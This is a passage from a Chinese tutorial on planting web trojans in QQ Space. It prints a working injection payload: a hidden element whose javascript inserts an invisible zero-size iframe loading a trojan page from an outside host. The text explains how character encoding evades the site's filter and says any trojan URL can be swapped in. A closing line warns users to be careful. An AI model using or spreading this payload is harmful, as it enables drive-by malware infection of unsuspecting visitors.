“<div id=DI><img src="javascript:DI.innerHTML='<iframe src="http://www.binghewu.com.cn/muma.htm" width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>'" style=display:none></div>”
同样的,在上面的代码中已经作了ASCII码转换躲过过滤;“http://www.binghewu.com.cn/muma.htm”是网页木马的链接地址,可以换成其它木马网页地址。代码中的其它语句是用来定义模块大小的,由于设置为0,该模块将在QQ空间中被隐藏,但是并不影响木马网页的打开与运行。这里为了说明攻击效果,笔者对代码作了一些修改,将木马网页显示为新浪首页,说明完全可以在QQ空间中打开其它木马网页的(如图7)。
图7 在QQ空间中挂上的新浪页面
怎么样,在QQ群和QQ空间中挂马是不是很简单?希望大家在上网的时候注意一下了。 (出处:清风学院)
上一篇:Photoshop图层操作巧为照片增添视觉冲击
下一篇:优化XP系统变量 道理在四个寓言故事中
|
精品推荐